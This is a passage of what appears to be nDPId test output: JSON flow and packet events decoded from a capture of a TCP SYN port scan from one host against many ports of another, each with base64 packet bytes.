+00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":632,"source":"synscan.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1278275059462,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1278275059462,"pkt":"ACWzv5HuACYLMQczCABFAAAsAABAADYG0nJADYY0rBAACABQjNJ7XAKI3VKDGWASFtCjyQAAAgQFZAAA"} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":633,"source":"synscan.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3905,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":633,"source":"synscan.pcap","alias":"nDPId-test","flow_id":624,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAstMUAACUGbq2sEAAIQA2GNIzSD0HdUoMYAAAAAGACCAAhTgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":634,"source":"synscan.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7625,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":634,"source":"synscan.pcap","alias":"nDPId-test","flow_id":625,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAsfagAAC8Gm8qsEAAIQA2GNIzSHcndUoMYAAAAAGACEAAKxgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":635,"source":"synscan.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":635,"source":"synscan.pcap","alias":"nDPId-test","flow_id":626,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAsrK8AADQGZ8OsEAAIQA2GNIzSJxTdUoMYAAAAAGACBAANewAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":636,"source":"synscan.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6779,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":636,"source":"synscan.pcap","alias":"nDPId-test","flow_id":627,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAsLFMAADMG6R+sEAAIQA2GNIzSGnvdUoMYAAAAAGACEAAOFAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":637,"source":"synscan.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":637,"source":"synscan.pcap","alias":"nDPId-test","flow_id":628,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAsE3gAADkG+\/qsEAAIQA2GNIzSF2\/dUoMYAAAAAGACCAAZIAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":638,"source":"synscan.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5810,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":638,"source":"synscan.pcap","alias":"nDPId-test","flow_id":629,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAsscoAACYGcKisEAAIQA2GNIzSFrLdUoMYAAAAAGACDAAV3QAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":639,"source":"synscan.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"synscan.pcap","alias":"nDPId-test","flow_id":630,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAsQukAACYG34msEAAIQA2GNIzSI43dUoMYAAAAAGACDAAJAgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":640,"source":"synscan.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":749,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":640,"source":"synscan.pcap","alias":"nDPId-test","flow_id":631,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAs7GYAADIGKgysEAAIQA2GNIzSAu3dUoMYAAAAAGACDAApogAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":641,"source":"synscan.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":641,"source":"synscan.pcap","alias":"nDPId-test","flow_id":632,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAstAUAADoGWm2sEAAIQA2GNIzSBRXdUoMYAAAAAGACDAAnegAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":642,"source":"synscan.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":642,"source":"synscan.pcap","alias":"nDPId-test","flow_id":633,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAs55oAADAGMNisEAAIQA2GNIzSH0LdUoMYAAAAAGACBAAVTQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":643,"source":"synscan.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":643,"source":"synscan.pcap","alias":"nDPId-test","flow_id":634,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAsdFgAADoGmhqsEAAIQA2GNIzSH6PdUoMYAAAAAGACDAAM7AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":644,"source":"synscan.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":644,"source":"synscan.pcap","alias":"nDPId-test","flow_id":635,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAswkMAADQGUi+sEAAIQA2GNIzSC9bdUoMYAAAAAGACBAAouQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"synscan.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059516,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"synscan.pcap","alias":"nDPId-test","flow_id":636,"flow_packet_id":1,"flow_last_seen":1278275059516,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059516,"pkt":"ACYLMQczACWzv5HuCABFAAAsixEAADEGjGGsEAAIQA2GNIzSBAfdUoMYAAAAAGACCAAsiAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":646,"source":"synscan.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059516,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2048,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"synscan.pcap","alias":"nDPId-test","flow_id":637,"flow_packet_id":1,"flow_last_seen":1278275059516,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059516,"pkt":"ACYLMQczACWzv5HuCABFAAAsfV4AADkGkhSsEAAIQA2GNIzSCADdUoMYAAAAAGACCAAojwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":647,"source":"synscan.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059516,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6547,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"synscan.pcap","alias":"nDPId-test","flow_id":638,"flow_packet_id":1,"flow_last_seen":1278275059516,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059516,"pkt":"ACYLMQczACWzv5HuCABFAAAsleYAAC8Gg4ysEAAIQA2GNIzSGZPdUoMYAAAAAGACEAAO\/AAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":648,"source":"synscan.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059517,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1036,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"synscan.pcap","alias":"nDPId-test","flow_id":639,"flow_packet_id":1,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059517,"pkt":"ACYLMQczACWzv5HuCABFAAAsdRgAADgGm1qsEAAIQA2GNIzTBAzdU4MZAAAAAGACBAAwgAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":649,"source":"synscan.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059517,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"synscan.pcap","alias":"nDPId-test","flow_id":640,"flow_packet_id":1,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059517,"pkt":"ACYLMQczACWzv5HuCABFAAAs8c8AAC8GJ6OsEAAIQA2GNIzTTiXdU4MZAAAAAGACEADaZgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":650,"source":"synscan.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059517,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"synscan.pcap","alias":"nDPId-test","flow_id":641,"flow_packet_id":1,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059517,"pkt":"ACYLMQczACWzv5HuCABFAAAs1WcAADIGQQusEAAIQA2GNIzT2TDdU4MZAAAAAGACDABTWwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":651,"source":"synscan.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059517,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8292,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"synscan.pcap","alias":"nDPId-test","flow_id":642,"flow_packet_id":1,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059517,"pkt":"ACYLMQczACWzv5HuCABFAAAsusMAACYGZ6+sEAAIQA2GNIzTIGTdU4MZAAAAAGACDAAMKAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":652,"source":"synscan.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059517,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":652,"source":"synscan.pcap","alias":"nDPId-test","flow_id":643,"flow_packet_id":1,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059517,"pkt":"ACYLMQczACWzv5HuCABFAAAsMsoAADoG26isEAAIQA2GNIzTJxHdU4MZAAAAAGACDAAFewAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":653,"source":"synscan.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":653,"source":"synscan.pcap","alias":"nDPId-test","flow_id":644,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsfjcAADIGmDusEAAIQA2GNIzTA\/HdU4MZAAAAAGACDAAomwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":654,"source":"synscan.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1455,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":654,"source":"synscan.pcap","alias":"nDPId-test","flow_id":645,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsIUEAADsG7DGsEAAIQA2GNIzTBa\/dU4MZAAAAAGACEAAi3QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":655,"source":"synscan.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":655,"source":"synscan.pcap","alias":"nDPId-test","flow_id":646,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsIGkAADsG7QmsEAAIQA2GNIzTI4PdU4MZAAAAAGACEAAFCQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":656,"source":"synscan.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1216,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":656,"source":"synscan.pcap","alias":"nDPId-test","flow_id":647,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAs8WwAADAGJwasEAAIQA2GNIzTBMDdU4MZAAAAAGACBAAvzAAAAgQFtA=="} 
